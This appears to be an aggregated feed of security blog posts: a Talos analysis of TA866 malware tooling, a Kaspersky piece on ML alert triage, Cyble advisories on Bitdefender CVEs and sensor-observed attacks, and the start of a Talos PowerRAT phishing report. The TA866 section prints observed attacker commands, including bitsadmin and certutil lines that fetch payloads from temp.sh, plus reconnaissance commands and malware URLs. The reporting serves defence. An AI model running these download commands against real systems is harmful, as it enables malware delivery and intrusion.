In the case of 404 TDS, the URLs accessed typically return an HTTP/404 error code, but a meta refresh is used to redirect victims to additional intermediary servers. These intermediary servers are typically responsible for identifying/querying information about the visiting systems to determine whether to redirect them to the malicious content or simply to a benign destination such as a search engine or email provider. 

In cases where malicious TDS redirection occurs, victims are delivered malicious payloads, which in the case of analyzed TA866 activity, are typically the malicious JavaScript-based downloaders used to initiate the infection process. 

Infection chains and tooling 

The most commonly observed infection chain associated with intrusions we attribute to TA866 is typified by the use of multiple distinct stages of custom malware, each responsible for conducting different actions to facilitate additional data gathering, reconnaissance and enable the threat actor flexibility in determining if a given infected system is a high-value target and whether they should operate further in compromised environments.

We have observed cases where extended periods of time elapse between when the threat actor gains initial access and persistence within compromised environments and the delivery of additional payloads, followed by the conduction of post-compromise activity within the environment. Over time we have observed variations in the infection chains used following initial compromise and assess that TA866 likely chooses to deploy tools in specific situations or target environments as needed while operating towards their longer-term mission objective(s). While variations do exist, we have observed consistent use of various tooling over the past couple of years, as described in the following sections. 

JavaScript downloaders 

In most observed cases, the infection process begins with the delivery of a malicious JavaScript downloader via the distribution process(es) previously described. This downloader is responsible for retrieving the next stage of the infection chain, which is often MSI packages containing a malware payload called WasabiSeed. The obfuscation used to hide the JavaScript being executed has varied across campaigns over time. An example of one is shown below. 

This code is responsible for initiating an HTTPS connection to retrieve and execute the WasabiSeed MSI package. In this case, the URL hosting the MSI package was: 

hxxps[:]//perfectsystems-ltd[.]com/x-css/cd.msi

Once downloaded, the MSI is passed to MsiExec to execute the next stage of the process. 

WasabiSeed  

WasabiSeed effectively functions as another downloader stage that is used to retrieve additional payloads from attacker-controlled servers. This is performed by a VBScript included in the MSI package delivered to infected systems. 

During execution, the MSI creates a subfolder within %PROGRAMDATA% and copies a malicious VBScript into this location. The name of the subdirectory and VBScript file varies across analyzed samples. 

A CustomAction[.]idt is defined, which executes the VBScript using wscript[.]exe when the MSI is run. The VBScript is stored in a CAB archive contained within the MSI package. Persistence is achieved via the use of an LNK shortcut that is dropped into the Startup directory on the system, ensuring that WasabiSeed is executed each time the system reboots. When run, it continuously reaches out to obtain arbitrary payloads in the form of MSI packages that are then executed by MsiExec to infect systems with additional malware. 

The URL used by this payload retrieval process is randomized using the drive serial number of the infected system, making it unique to each system. This continuous polling allows the delivery of arbitrary payloads at the discretion of the threat actor at any point following initial access. In most cases, we observed subsequent delivery of an additional MSI containing a malware tool called Screenshotter.  

Screenshotter 

Screenshotter is a malware family used to generate periodic screenshots from infected systems which are transmitted to the threat actor over HTTP. We have observed the delivery of multiple variants of Screenshotter and have identified implementations of the malware in a variety of programming languages, including JavaScript and Python. 

We also identified an implementation of Screenshotter using an AutoHotKey script, likely to enable this functionality directly within AHK Bot, which is also often delivered during the infection process and described in the next section. 

In both the JavaScript and Python implementations of Screenshotter, the malware is delivered within an MSI package. The MSI associated with the JavaScript implementation contains two JavaScript files, “app[.]js” and “index[.]js” as well as a legitimate screen capture binary, typically IrfanView. Like WasabiSeed, a CustomAction[.]idt is used to execute the JavaScript files using wscript[.]exe, as shown below. 

The MSI creates a subdirectory with %PROGRAMDATA% and copies the Screenshotter components into it. The script “app[.]js” is responsible for executing IrfanView to capture screenshots periodically. It is also responsible for ensuring that only one instance of Screenshotter is running at a time. 

The script “index[.]js” is responsible for facilitating the transmission of captured screenshots to the adversary via C2. 

Like WasabiSeed, the URL used is generated using the drive serial number of the system, which is appended to the end of the URL used for exfiltration, as shown below.  

http://<C2 Server>/screenshot/<Drive Serial Number>

While we have observed variations in the JavaScript implementation of Screenshotter, in all cases the overall functionality and operation of the malware is consistent. 

The Python implementation also functions similarly with some notable differences. The CAB archive contains a legitimate Python installation as well as a Python script (screen1[.]pyw) that takes the place of IrfanView as used in the JavaScript implementation. A CustomAction[.]idt is used to execute a VBScript, as shown below. 

The VBScript executes the Python binary and passes the screen capturing Python script as a parameter.  

The Python script captures screenshots and transmits them to the C2 server, as shown in the example below. 

Screenshotter enables the collection of additional information such as typical system usage and potentially sensitive information being displayed on screen and allows the threat actor to determine whether they should continue to operate within the system and associated network environment. In a subset of cases analyzed, AHK Bot was also delivered and is described in the next section. 

AHK Bot 

Along with the deployment of WasabiSeed and Screenshotter, we have frequently observed the deployment of an AutoHotKey (AHK) based malware called AHK Bot.   

AHK Bot is a modular malware family that uses AHK scripts to implement various functionality required by the adversary. While there are likely additional scripts that have been developed and deployed by the threat actor, we identified several used in previous intrusion activity as well as in public malware repositories that provide a glimpse into the functionality available with AHK Bot. We assess that these scripts were likely developed by the author of AHK Bot for delivery and use on systems previously infected with AHK Bot.  

These scripts perform the following actions: 

Looper (Persistence and periodic C2 polling). System enumeration. Screenshotter. Domain identification. Secondary C2 connection establishment. Keystroke logging. Credential theft. HVNC deployment and removal. Remote access software deployment and removal. 

AHK Bot is typically delivered to previously infected systems via MSI files which contain the legitimate AutoHotKey binary used to execute AHK scripts, as well as a base AHK script that is referred to as the “looper” in prior reporting. When executed, it creates a subdirectory within C:ProgramData and copies the AutoHotKey binary, as well as the main AHK script into it. It then executes the AHK script and begins polling C2 to wait for additional instructions/scripts to execute.  

Looper 

This script is responsible for establishing persistence for AHK Bot by creating a LNK shortcut within the Startup directory on the system. It also performs periodic polling to an attacker-defined C2 server to retrieve additional AHK scripts for execution on the system.  

As this process repeats each time the system reboots, this provides a robust, modular mechanism for threat actors to further interact with the system as desired.  

System enumeration 

The system and hardware enumeration AHK script uses Windows Management Instrumentation (WMI) to collect information about the hardware and software configuration of the infected system. The following information is collected: 

General system information (OS, hardware devices present, location, etc.). Hard disk configuration. Processor information. RAM configuration. GPU configuration. Networking device information. Firewall, anti-virus and anti-spyware software information. Running process list. 

This information is written to a file (hardware[.]txt) present within the current working directory of the script. This file is then uploaded to the C2 server via HTTP POST requests.  

Screenshotter (deskscreen) 

This AHK script is effectively an alternative implementation of Screenshotter written directly for execution by AHK Bot. It captures screenshots of the infected system and transmits them to the C2 server, like the versions of Screenshotter implemented in JavaScript or Python. Consistent with what was observed in the Python implementation of Screenshotter, this version does not require the use of an external screen capturing utility and the screenshot capture is implemented directly within the AHK script.  

Captured screenshots are transmitted to the attacker’s C2 server, as shown below. 

This version of Screenshotter also features logging capabilities and supports the transmission of status logs to the attacker. 

The code associated with this implementation of Screenshotter also contains comments written in Russian, as shown below. 

The main functionality of the script is comparable with other implementations of Screenshotter seen previously. 

Domain Identification (domain) 

This script is simply used to retrieve the domain membership of an infected system. The domain is retrieved via Windows Management Instrumentation (WMI) and then transmitted to the C2 server via HTTP POST requests as shown below. 

Connect 

The connect script is simply used to establish a connection to an attacker-controlled server and send connection status logs and receive an HTTP response from the server, as shown below. 

Keystroke logging 

This script can log keystrokes on infected systems and send a log of user input to the attacker. First it checks to see if the keylogger process already exists on the system. If not, it attempts to retrieve the AutoHotKey binary from an attacker-controlled server. 

The AHK script has a fully implemented keylogger capability. Collected keystrokes are transmitted via HTTP POST requests. 

The keylogger also features persistence, which is established via the creation of a new Windows shortcut LNK within the StartUp directory on infected systems, allowing the keylogger to be executed each time the system reboots. 

Credential theft (_passwords) 

This script is a browser password stealer that has been implemented as an AHK script. It enables the threat actor to retrieve cached credentials from common browsers that may be installed and in use on infected systems.   

The script begins by setting the download location for the SQLite3 DLL required to parse browser credential stores. It also retrieves the serial number of the C: drive on the system. 

It then checks to determine if the DLL currently exists on the infected system. If not, it attempts to retrieve it from an attacker-controlled server. 

It then attempts to retrieve browsing history and passwords from Internet Explorer, Mozilla Firefox and Chromium-based browsers using multiple methods. 

Status logging and credential information is transmitted to the C2 server via HTTP communications. 

Comments present in the code reference Russian language knowledge base articles.

HVNC deployment and removal 

We have observed two AHK scripts that are used to either deploy or remove hVNC on infected systems. To achieve this, the deployment script attempts to download 7-Zip and hVNC and uses 7-Zip to extract the hVNC files. 

The hVNC application is then executed. Logs associated with the deployment are transmitted to the command and control (C2) via HTTP POST requests.  

The AHK script for hVNC removal simply uses taskkill.exe to terminate the hVNC and 7-Zip processes running on the system. 

Remote access software deployment & removal 

Like what was described for hVNC, two AHK scripts are also used to deploy the commercial Remote Utilities remote access software to infected systems, enabling persistent remote access for the attacker. The scripts attempt to retrieve Remote Utilities from an attacker-controlled server and install it on the system for use to remotely interact with the system.  

Likewise, log messages generated during this process are sent to C2 via HTTP POST requests to provide status updates and alert attackers of any failures that may have been encountered during the deployment. 

Post-compromise activities 

Following successful system compromise, we have observed TA866 conducting various post-compromise activities. In some cases, extended periods of time were observed between initial access and the deployment of follow-on payloads described in the previous section. In many cases, once the actor was on the system they began to conduct information gathering and reconnaissance within the environment, using a combination of built-in and legitimate Windows utilities.  

We have seen execution of a variety of system commands we attribute to the adversary operating on the system. This includes but is not limited to the following:

cmd.exe /c chcp 65001 && net group Domain Computers /domaincmd.exe /c chcp 65001 && set l cmd.exe /c chcp 65001 && nltest /DOMAIN_TRUSTS ipconfig /allwhoami whoami /groups systeminfo 

Other utilities like AdFind and network-scanning applications have been deployed and used. 

In a limited number of cases, we have also observed the deployment of additional malware including: 

Cobalt Strike Rhadamanthys CSharp-Streamer-RAT Resident backdoor Remote access software (TeamViewer, Remote Utilities) 

In the case of Rhadamanthys, we have observed AHK Bot being used to retrieve DLL-based shellcode loaders and execute them on the system to load Rhadamanthys into memory.  

Rhadamanthys is an information stealer that can be used to collect and exfiltrate a variety of sensitive data from infected systems. It is described extensively in prior reporting.  

C:Windowssystem32bitsadmin.exe /transfer
mydownloadjob /download /priority normal hxxps[:]//temp[.]sh/ThuNJ/2[.]dll

We have also observed the use of native Windows binaries, like certutil.exe, being used to retrieve and execute Resident backdoor on systems.  

While not specifically attributed in prior reporting, based on analysis of previous intrusion activity that we attribute to TA866 during the period in which Resident was deployed, we assess with high confidence that TA866 was responsible for its deployment in cases we analyzed. Likewise additional TTPs described in the reporting match those we have observed and attributed to TA866 since 2023. 

certutil -urlcache -split -f hxxps[:]//temp[.]sh/esuJB/resident[.]exe C:programdatares.exe

As described in prior reporting, Resident is a backdoor that can be used to download and execute additional payloads on victim systems. 

Across the intrusion activity analyzed, we observed the threat actor making frequent use of file hosting sites such as hxxps[:]//temp[.]sh for the purpose of payload hosting and delivery. We also noted consistency in the URL structure used by various components in the infection chains to retrieve dependencies needed for them to execute properly.  

Targeting/victimology 

While long-term targeting associated with the distribution campaigns appears indiscriminate, most of the cases where follow on payloads have been observed were in the United States, with additional cases spread across Canada, United Kingdom, Germany, Italy, Austria and the Netherlands. The most affected industry was the manufacturing sector, followed closely by government and financial services, but organizations across many industries have also been affected.  

Links to recent intrusion activity 

We have observed overlaps between historic TA866 intrusion activity and recent WarmCookie/BadSpace campaign activity.  

Most notably, we have observed the following: 

We have observed CSharp-Streamer-RAT delivered as a follow-on payload in TA866 intrusion activity from 2023 as well as WarmCookie intrusion activity in 2024. The C2 servers used by both CSharp-Streamer-RAT samples shared SSL characteristics that appear to have been programmatically generated in a consistent manner. Leveraging internet census data, we identified a cluster of four total C2 servers with SSL certificates matching this algorithm. Following an analysis of both Resident backdoor and WarmCookie, we assess that the same threat actor likely authored both. In several cases, core functionality is implemented in a consistent manner across both Resident backdoor samples and recent WarmCookie samples.  

Based on our analysis, we assess that TA866 is likely associated with both clusters of malicious activity.  

Prior reporting also indicates that the CSharp-Streamer-RAT C2 server (109[.]236[.]80[.]191) observed in previous intrusion activity that we attribute to TA866 has also been seen in intrusion activity linked to IcedID and ALPHV ransomware. 

In several cases, we observed the repeated deployment of Cobalt Strike beacons following successful compromise of organizational networks. We have observed overlaps in the distribution infrastructure used and the cluster of infrastructure associated with ShadowSyndicate in prior reporting. 

Mitre ATT&CK Techniques 

Reconnaissance  

T1589.002 Gather Victim Identity Information: Email Addresses  

Resource Development  

T1586.002 Compromise Accounts: Email Accounts  T1608.006 Stage Capabilities: SEO Poisoning  T2583.008 Acquire Infrastructure: Malvertising  

Initial Access  

T1566 Phishing  T1566.001 Spearphishing Attachment  T1566.002 Spearphishing Link  

Execution  

T1059.001 Command and Scripting Interpreter: PowerShell  T1059.003 Command and Scripting Interpreter: Windows Command Shell  T1047 Windows Management Instrumentation  

Persistence  

T1574.002 Hijack Execution Flow: DLL Side-Loading  

Defense Evasion  

T1218.007 System Binary Proxy Execution: Msiexec  

Discovery  

T1069.002 Permission Groups Discovery: Domain Groups  T1016 System Network Configuration Discovery  T1482 Domain Trust Discovery  T1018 Remote System Discovery  T1057 Process Discovery  T1007 System Service Discovery  T1518.001 Software Discovery: Security Software Discovery  T1124 System Time Discovery  T1082 System Information Discovery  T1033 System Owner / User Discovery  

Command and Control  

T1105 Ingress Tool Transfer  T1219 Remote Access Software  T1071.001 Application Layer Protocol: Web Protocols 

Coverage 

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org

The following Snort rule(s) have been developed to detect activity associated with this malicious activity.  

Snort 2 SIDs: 64139, 64140, 64141, 64142, 64143, 64144, 64145, 64146, 64147, 64148, 64149, 64150, 64151, 64152, 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162.   Snort 3 SIDs: 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162, 301044, 301045, 301046, 301047, 301048, 301049, 301050.  

The following ClamAV signatures have been developed to detect activity associated with this malicious activity.  

Js.Downloader.Agent-10022279-0  Vbs.Downloader.Agent-10022291-0  Win.Trojan.WasabiSeed-10022304-0  Js.Trojan.Screenshotter-10022306-0  Js.Trojan.Agent-10022307-0  Win.Trojan.Lazy-10022308-0  Win.Trojan.Screenshotter-10022309-0  PUA.Win.Tool.NetPing-10022493-0  Win.Malware.CobaltStrike-10022494-0  PUA.Win.Tool.AutoHotKey-10022305-1  PUA.Win.Tool.RemoteUtilities-9869515-0  PUA.Win.Tool.AdFind-9962378-0   Txt.Downloader.AHKBot-10024463-0  Ps1.Malware.CobaltStrike-10024466-0  Win.Infostealer.Rhadamanthys-10024467-0  Txt.Infostealer.Rhadamanthys-10024468-0  Win.Backdoor.Agent-10025011-0  Vbs.Trojan.Screenshotter-10025015-0  Win.Malware.Warmcookie-10036688-0 Win.Malware.CSsharpStreamer-10036641-0 

Indicators of Compromise 

Indicators of compromise associated with TA866 activity can be found in our GitHub repository here

Cisco Talos Blog – ​Read More

Effective AI adoption for optimizing SOC analysts’ work

/in

There are various ways artificial intelligence can be used in cybersecurity – from threat detection to simplifying incident reporting. However, the most effective uses are those that significantly reduce human workload without requiring large, ongoing investments to keep the machine learning models up to date and performing well.

In a previous article, we discussed how difficult and labor-intensive it is to maintain a balance between reliable cyberthreat detection and low false-positive rates in AI models. Thus, the question posed in the title is easy to answer: AI can’t replace experts – but it can alleviate some of their workload by handling “simple” cases. Moreover, as the model learns over time, the range of these “simple” cases will expand. To really save the time of cybersecurity staff, we need to identify areas of work where changes occur more slowly than in direct cyberthreat detection. One promising candidate for automation is the processing of suspicious events (triage).

The detection funnel

To gather enough data to detect complex threats, the SOC of a modern organization has to collect millions of events daily from sensors across the network and connected devices. After grouping and initial filtering with SIEM algorithms, these events are distilled into thousands of alerts about potentially malicious activity. These alerts must usually be investigated by humans, but only a small fraction of these messages contain real threats. According to Kaspersky MDR’s data for 2023, our clients’ infrastructures generated billions of events daily, resulting in 431,512 alerts about potentially malicious activity identified throughout the year; however, only 32,294 alerts were linked to genuine security incidents. This means that machines effectively sifted through hundreds of billions of events, while only sending a tiny percentage to humans for review. However, 30 to 70% of these events are immediately flagged by analysts as false positives, and around 13% are confirmed as incidents after a deeper investigation.

Role of “Auto-Analyst” in the SOC

The Kaspersky MDR team has developed an “Auto-Analyst” for the initial filtering of alerts. This supervised machine-learning system trains on alerts from the SIEM system, combined with the SOC verdict on each alert. The goal of the training is for the AI to confidently identify false positives generated by legitimate network activity. Because this area is less dynamic than threat detection, it’s easier to apply machine learning to.

Machine learning here is based on CatBoost – a popular gradient-boosting library. The trained “Auto-Analyst” filters alerts and only forwards for human review the ones with a probability of a real incident above a specified threshold, determined by the acceptable error rate. As a result, around 30% of alerts are handled by the Auto-Analyst, freeing up the SOC team for more complex tasks.

Practical nuances of the Auto-Analyst’s work

Processes are paramount in SOC operations, and new technologies require adapting or building new processes around them. For AI systems, these processes include:

Controlling training data. To ensure that the AI learns from the correct data, the training set needs to be thoroughly reviewed in advance to confirm that the analysts’ verdicts therein were accurate.
Prioritization of incoming data. Every alert contains numerous information fields, but their importance varies. Part of the training involves assigning “weights” to these different fields. The feature vector used by the machine-learning model is based on fields selected by experts from SIEM alerts, and the field list depends on the type of specific alert. Note that the model can perform such prioritization on its own, but the results should be supervised.
Selective review of results. The SOC team double-checks approximately 10% of the Auto-Analyst’s verdicts to ensure the AI isn’t making errors (especially false negatives). If such errors occur and exceed a certain threshold (for example, more than 2% of the verdicts), retraining the AI is necessary. Incidentally, selective reviews are also conducted for the human analysts’ verdicts in the SOC — because people often make mistakes as well.
Interpreting the results. The ML model should be equipped with interpretation tools so we can understand its verdict rationale and the influencing factors. This helps adjust the training dataset and input weights. For example, one case required adjustment when the AI started flagging network communications as “suspicious” without considering the “Source IP address” field. Analyzing the AI’s work using this tool is an essential part of the selective review.
Excluding AI analysis for certain alerts. Some detection rules are so critical that even a small chance of the AI filtering them out is unacceptable. In such cases, there should be a flag in the rule to “exclude from AI processing”, and a process for prioritizing these alerts.
Optimizing filtering. Another regular process necessary for the effective work of the AI analyst in the SOC is identifying similar alerts. If the AI analyst rejects dozens of similar alerts, there should be a process to upgrade these verdicts to filtering rules within the SIEM. Ideally, the AI analyst itself generates a request to create a filtering rule, which is then reviewed and approved by a responsible SOC analyst.

To effectively counter cyberthreats, organizations need to acquire deeper expertise in various technological areas, including storing and analyzing vast amounts of data, and now machine learning, too. For those who want to quickly compensate for a shortage of skilled personnel or other resources, we recommend getting this expertise in a ready-made form with the Kaspersky Managed Detection and Response service. This service provides continuous threat hunting, detection and response for your organization.

Kaspersky official blog – ​Read More

Bitdefender Total Security Vulnerabilities: Recent Patches and Recommendations

/in

Overview

Bitdefender has issued a security advisory detailing critical vulnerabilities within its flagship products, Bitdefender Total Security and SafePay. These vulnerabilities pose significant risks to users and require urgent patching. 

Bitdefender Total Security serves as a cybersecurity solution designed to protect devices across various platforms against malware, ransomware, and numerous other cyber threats. Its key features include real-time threat detection, privacy safeguards, and performance enhancements. A standout feature, SafePay, is a secure browser that isolates users’ online activities—such as banking and shopping—encrypts transactions to prevent unauthorized access and ensure safe financial interactions.

The vulnerability classification is based on the Common Vulnerability Scoring System (CVSS) and includes four categories: Critical (9.0-10), High (7.0-9.0), Medium (4.0-6.9), and Low (0.0-3.9). The advisory highlights six high-severity vulnerabilities, each assigned a corresponding CVE ID: CVE-2023-6055, CVE-2023-6056, CVE-2023-6057, CVE-2023-6058, CVE-2023-49567, and CVE-2023-49570. All of these vulnerabilities affect Bitdefender Total Security and SafePay, with patches now available via automatic updates.

Vulnerability Details


CVE-2023-6055: The first vulnerability, identified as CVE-2023-6055, relates to improper certificate validation in Bitdefender Total Security. It has a CVSS score of 8.6, indicating a high severity level. The issue stems from the software’s failure to adequately validate HTTPS website certificates. Specifically, if a site certificate does not include “Server Authentication” in its Extended Key Usage extension, the software incorrectly considers it valid. This flaw can enable an attacker to conduct a Man-in-the-Middle (MITM) attack, potentially intercepting and modifying communications between users and websites. To address this issue, an automatic update to version 27.0.25.115 is available.

CVE-2023-6056: Another significant vulnerability, CVE-2023-6056, also carries a high severity score of 8.6. This vulnerability involves the software improperly trusting self-signed certificates, particularly those signed with the RIPEMD-160 hashing algorithm. As a result, attackers can establish MITM SSL connections to arbitrary sites. Users are encouraged to install the automatic update to version 27.0.25.115 to mitigate this risk.

CVE-2023-6057: The third vulnerability, CVE-2023-6057, is found within the HTTPS scanning functionality of Bitdefender Total Security. With a CVSS score of 8.6, this vulnerability arises from the software’s failure to adequately check the certificate chain for DSA-signed certificates, allowing for potential MITM attacks. To resolve this issue, users should apply the automatic update to version 27.0.25.115.

CVE-2023-6058: This vulnerability impacts Bitdefender SafePay and has a high severity score of 8.6. It occurs when SafePay blocks a connection due to an untrusted server certificate, but users have the option to add the site to exceptions. By doing so, the software subsequently trusts the certificate for future HTTPS scans, which can open the door to MITM attacks using self-signed certificates. An automatic update to version 27.0.25.115 is available to fix this vulnerability.

CVE-2023-49567: Another critical vulnerability is CVE-2023-49567, which has the same CVSS score of 8.6. This flaw is due to the software trusting certificates issued using MD5 and SHA1 collision hash functions, enabling attackers to create rogue certificates that appear legitimate. Users should update to version 27.0.25.115 to eliminate this risk.

CVE-2023-49570: This vulnerability also scores 8.6 on the CVSS scale. This vulnerability allows Bitdefender to trust a certificate issued by an unauthorized entity, potentially enabling MITM attacks. To protect against this risk, users should install the automatic update to version 27.0.25.115.

Recommendations and Mitigations

To mitigate the risks associated with these vulnerabilities, the following strategies are recommended:


Organizations should regularly update all software systems with the latest patches from official vendors. Establishing a routine for applying critical patches immediately can reduce vulnerabilities.

A comprehensive strategy should encompass inventory management, patch assessment, testing, deployment, and verification. Automation of these processes can enhance consistency and efficiency.

Implement proper segmentation to protect critical assets from less secure areas. This strategy can help limit exposure and reduce potential attack surfaces.

Organizations should maintain a clear incident response plan detailing how to detect, respond to, and recover from security incidents. Regular testing of this plan is essential to ensure its effectiveness.

Comprehensive monitoring solutions should be in place to detect and analyze suspicious activities. Utilizing Security Information and Event Management (SIEM) systems can enhance real-time threat detection and response capabilities.

Organizations must proactively evaluate the criticality of their End-of-Life (EOL) products and plan for timely upgrades or replacements to minimize security risks.

Conclusion

The recent vulnerabilities found in Bitdefender Total Security and SafePay highlight critical risks that can undermine users’ cybersecurity defenses. While these products are designed to protect against a myriad of threats, the existence of high-severity vulnerabilities necessitates a proactive approach to patch management. Organizations must remain vigilant, ensuring that their cybersecurity solutions are not only effective but also up-to-date to prevent exploitation.

The post Bitdefender Total Security Vulnerabilities: Recent Patches and Recommendations appeared first on Cyble.

Blog – Cyble – ​Read More

Cyble Sensors Detect Attacks on Java Framework, IoT Devices

/in

Overview

Cyble’s weekly sensor intelligence report detailed more than 30 active attack campaigns against known vulnerabilities.

New attacks were observed against a vulnerability in the Spring Java framework, and more than 400,000 attacks were observed exploiting a known IoT vulnerability.

Cyble’s Vulnerability Intelligence unit also observed thousands of brute-force attacks and hundreds of phishing campaigns.

Here are some highlights from Cyble’s October 17 sensor report sent to clients.

CVE-2024-38816: Spring Java Framework Exploit

CVE-2024-38816 is a high-severity Path Traversal vulnerability in the popular Spring Java framework that is still undergoing NVD assessment. Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks.

An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running. Specifically, an application is vulnerable when both of the following are true: the web application uses RouterFunctions to serve static resources, and resource handling is explicitly configured with a FileSystemResource location.

Malicious requests are blocked and rejected when either of the following is true: the Spring Security HTTP Firewall is in use, or the application runs on Tomcat or Jetty.

CVE-2020-11899: Treck TCP/IP Stack

CVE-2020-11899 is a medium-severity Out-of-bounds Read vulnerability in the Treck TCP/IP stack, which was developed as an IPv6 implementation for the limited space of embedded devices. The flaw affects Treck TCP/IP versions before 6.0.1.66 and is also part of the “Ripple20” series of vulnerabilities that can lead to data theft, changes in device behavior or function, network intrusion, device takeover, and other malicious activities.

Cyble sensors detected more than 411,000 attacks on the CVE-2020-11899 vulnerability from Oct. 9 to 15, 2024, often in an attempt to gain administrator privileges (image below).

Cyble sensors have detected attacks against other “Ripple20” vulnerabilities during this period—most notably CVE-2020-11900, an IPv4 tunneling Double Free vulnerability also present in the Treck TCP/IP stack before 6.0.1.41—so IoT environments that may contain these vulnerabilities should check for exposures and apply appropriate mitigations.

CISA’s Ripple20 advisory – updated last month – lists 17 industrial, medical, and critical infrastructure device manufacturers whose products were potentially affected by the vulnerabilities.

Linux, PHP, and Other Attacks Persist

Several other recent exploits observed by Cyble remain active. Linux systems remain under attack as threat actors (TAs) have become increasingly resourceful at delivering malware via package managers and other means. CoinMiner, Mirai, and IRCBot attacks remain active threats against Linux systems.

Previously reported vulnerabilities in PHP (CVE-2024-4577), GeoServer (CVE-2024-36401), and AVTECH IP cameras (CVE-2024-7029) also remain under active attack by threat actors.

Phishing Scams Detected by Cyble

Cyble detected 478 new phishing email addresses this week, a multi-week high. Below is a table listing the email subject lines and deceptive email addresses used in six prominent scam campaigns.

E-mail Subject 
Scammers Email ID 
Scam Type 
Description 

ABOUT YOUR PAYMENT… 
dr.sumitra@ukrit.in 
Claim Scam 
Fake refund against claims 

ATTN: Lucky Winner 
santaluciasrspen1@spainmail.com 
Lottery/Prize Scam 
Fake prize winnings to extort money or information 

GOD BLESS YOU…. 
info@advanceairsystem.com 
Donation Scam 
Scammers posing as Donors to donate money 

My Donation 
test@cinematajrobi.ir 
Investment Scam 
Unrealistic investment offers to steal funds or data 

Order 21542906: cleared customs 
support@recryptogen.com  
Shipping Scam 
Unclaimed shipment trick to demand fees or details 

UN Compensation Fund 
info@usa.com 
Government Organization Scam 
Fake government compensation to collect financial details 

Brute-Force Attacks

Cyble sensors detected thousands of brute-force attacks in the most recent report. The top 5 attacker countries and ports targeted were: Vietnam – ports 22 (52%), 3389 (25%), and 445 (22%); attacks originating from the United States targeted ports 5900 (58%), 22 (20%), 3389 (15%), 445 (5%), and 135 (2%). Ukraine, Russia, and Greece majorly targeted ports 3389, 1433, 5900, and 445. Security Analysts are advised to add security system blocks for the attacked ports (such as 22, 3389, 443, 445, 5900, and 3306).

Recommendations and Mitigations

Cyble researchers recommend the following security controls:


Blocking target hashes, URLs, and email info on security systems (Cyble clients received a separate IoC list).

Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks.

Constantly check for Attackers’ ASNs and IPs.

Block Brute Force attack IPs and the targeted ports listed.

Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes.

For servers, set up strong passwords that are difficult to guess.

Conclusion

With active threats against multiple systems highlighted, companies need to remain vigilant and responsive. The large number of brute-force attacks and phishing campaigns demonstrates the vulnerability crisis faced by organizations.

To protect their digital assets, organizations should address known vulnerabilities and implement recommended security controls, such as blocking malicious IPs and securing network ports. A proactive and layered security approach will be key in protecting defenses against exploitation and data breaches.

The post Cyble Sensors Detect Attacks on Java Framework, IoT Devices appeared first on Cyble.

Blog – Cyble – ​Read More

Threat actor abuses Gophish to deliver new PowerRAT and DCRAT

/in

Cisco Talos recently discovered a phishing campaign using an open-source phishing toolkit called Gophish by an unknown threat actor.  The campaign involves modular infection chains that are either Maldoc or HTML-based infections and require the victim’s intervention to trigger the infection chain.  Talos discovered an undocumented PowerShell RAT we’re calling PowerRAT,  as one of the payloads and another infamous Remote Access Tool (RAT) DCRAT. We found a few placeholders for base64 encoded PowerShell scripts in the PowerRAT, indicating that the threat actor is actively developing their tools.  

Victimology 

Talos assesses with high confidence that the threat actor is targeting Russian-speaking users based on the language used in the Phishing emails, luring contents of Malicious documents, a masqueraded HTML webpage of Vkontake (VK), a popular social media application amongst Russian speakers, especially in Russia, Ukraine, Belarus, Kazakhstan, Uzbekistan, and Azerbaijan.  

 

 

Actor uses Gophish to send phishing emails 

Our analysis of the malicious hyperlinks embedded in the phishing emails disclosed to us the attacker-controlled hosting domains disk-yanbex[.]ru delivered the Malicious Microsoft Word document, and an HTML file embedded with the malicious JavaScript.   

The domain disk-yanbex[.]ru resolves to the IP address 34[.]236[.]234[.]165, an AWS EC2 instance with the fully qualified domain name ec2-34-236-234-165[.]compute-1[.]amazonaws[.]com, during our analysis. We also observed that the same server 34[.]236[.]234[.]165 was reverse resolving to another domain e-connection[.]ru, which also delivered malicious JavaScript-embedded HTML files. Our further analysis of the server 34[.]236[.]234[.]165 disclosed to us that the actor hosted the Gophish toolkit on the server running at port number 3333. Gophish is an Open-Source easy-to-deploy phishing toolkit that is developed to conduct security awareness training according to the tool’s developer.  

Attacker hosting Gophish.

Talos analysis of the phishing email sample’s header showed us that the email was first delivered from server 34[.]236[.]234[.]165, indicating that the threat actor is misusing the Gophish framework in this campaign to deliver phishing emails to their targets.   

Sample Phishing email header. 

Multi-modular Campaign delivers PowerRAT and DCRAT  

The campaign has two initial attack vectors, one based on malicious Word documents and another based on HTML files containing malicious JavaScript. Upon activation, these would lead to the download and activation of PowerRAT or DCRAT depending on the initial vector. Both the attack chains require user intervention to trigger the infections on the compromised machines. 

Maldoc-based infection delivers PowerRAT 

When a victim opens the Microsoft Word document and enables the view contents button displayed in the document banner, the malicious VB macro program executes.  

The macro program initially executes a function that decodes or translates specific encoded symbols in the lure contents of the Word document into their corresponding characters from another alphabet in Cyrillic, transforming the lure contents into readable form. 

We spotted a base64 encoded data blob on the third page of the Word document and the actor used the text color the same as that of the document’s default background color, hiding them from the victim’s view.  

